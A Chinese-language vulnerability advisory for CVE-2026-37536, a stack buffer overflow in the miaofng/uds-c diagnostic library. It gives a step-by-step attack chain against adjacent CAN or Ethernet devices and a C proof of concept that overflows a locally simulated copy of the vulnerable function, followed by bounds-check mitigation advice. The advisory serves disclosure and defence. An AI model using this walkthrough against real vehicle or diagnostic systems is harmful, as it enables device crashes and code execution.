CVE-2026-37536 miaofng/uds-c 栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-37536

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

miaofng/uds-c

漏洞概述

miaofng/uds-c项目的特定提交版本中存在严重的栈缓冲区溢出漏洞。该漏洞源于`send_diagnostic_request`函数在处理数据时未对用户输入的`payload_length`进行边界检查，导致向6字节栈缓冲区写入10字节数据。攻击者可通过邻接网络发送特制数据包触发此漏洞，可能导致服务拒绝服务或任意代码执行。

技术细节

该漏洞位于`miaofng/uds-c`库的`send_diagnostic_request`函数实现中。函数内部定义了一个仅6字节大小的栈缓冲区（`MAX_DIAGNOSTIC_PAYLOAD_SIZE=6`）用于存储诊断数据。在代码逻辑中，程序使用`memcpy`函数将外部输入的payload数据复制到该栈缓冲区偏移量为`1+pid_length`的位置。然而，代码在执行复制操作前，未对`payload_length`进行任何长度校验。根据描述，当`payload_length`为7且`pid_length`为2时，写入总量将达到10字节，超出缓冲区容量4字节。由于攻击向量为邻接网络且无需认证，攻击者可轻易构造恶意UDS诊断数据包发送给目标设备，触发栈溢出并覆盖返回地址，进而可能控制程序执行流程，实现远程代码执行或导致设备崩溃。

攻击链分析

STEP 1

侦察

攻击者识别暴露在邻接网络（如车载网络、局域网）中的运行 miaofng/uds-c 库的目标设备。

STEP 2

武器化

攻击者构造恶意的 UDS (Unified Diagnostic Services) 诊断请求包，将 payload_length 设置为 7 (MAX_UDS_REQUEST_PAYLOAD_LENGTH)，并填充恶意数据。

STEP 3

投递

通过邻接网络接口（如 CAN 总线或以太网）将构造好的恶意数据包发送给目标设备的诊断服务端口。

STEP 4

利用

目标设备的 `send_diagnostic_request` 函数接收数据，由于未检查边界，执行 memcpy 操作，向 6 字节栈缓冲区写入 10 字节数据，导致栈溢出。

STEP 5

后渗透

溢出数据覆盖返回地址或关键变量，导致设备崩溃（DoS）或 potentially 执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <string.h>
#include <stdint.h>

// Simulated vulnerable function based on CVE description
#define MAX_DIAGNOSTIC_PAYLOAD_SIZE 6

void send_diagnostic_request(uint8_t pid_length, uint8_t *payload, uint8_t payload_length) {
    uint8_t buffer[MAX_DIAGNOSTIC_PAYLOAD_SIZE];
    // Vulnerability: No bounds check on payload_length before memcpy
    // Offset: 1 + pid_length
    memcpy(&buffer[1 + pid_length], payload, payload_length);
}

int main() {
    // Setup parameters to trigger overflow
    // MAX_UDS_REQUEST_PAYLOAD_LENGTH is defined as 7 in the original code
    uint8_t pid_len = 2; 
    uint8_t malicious_payload[7];
    
    // Fill payload with 'A' (0x41)
    memset(malicious_payload, 0x41, sizeof(malicious_payload));

    printf("[*] Triggering CVE-2026-37536 Stack Buffer Overflow...\n");
    printf("[*] Writing %d bytes to buffer of size %d at offset %d\n", 
           sizeof(malicious_payload), MAX_DIAGNOSTIC_PAYLOAD_SIZE, 1 + pid_len);
    printf("[*] Total write size: %d bytes (Overflow: %d bytes)\n", 
           1 + pid_len + sizeof(malicious_payload), 
           (1 + pid_len + sizeof(malicious_payload)) - MAX_DIAGNOSTIC_PAYLOAD_SIZE);

    send_diagnostic_request(pid_len, malicious_payload, sizeof(malicious_payload));
    
    printf("[*] Exploit payload sent.\n");
    return 0;
}

影响范围

miaofng/uds-c commit e506334e270d77b20c0bc259ac6c7d8c9b702b7a

防御指南

临时缓解措施

建议立即修补代码中的边界检查逻辑。在调用 `memcpy` 之前，验证 `1 + pid_length + payload_length` 是否小于或等于 `MAX_DIAGNOSTIC_PAYLOAD_SIZE`。在无法立即修复的情况下，应限制对受影响设备诊断端口的邻接网络访问，仅允许信任的源地址进行通信。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-37536
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-37536
3 Details https://www.cvedetails.com/cve/CVE-2026-37536/
4 VulDB https://vuldb.com/cve/CVE-2026-37536
5 Link https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381
6 Link https://github.com/miaofng/uds-c
7 Link https://github.com/openxc/uds-c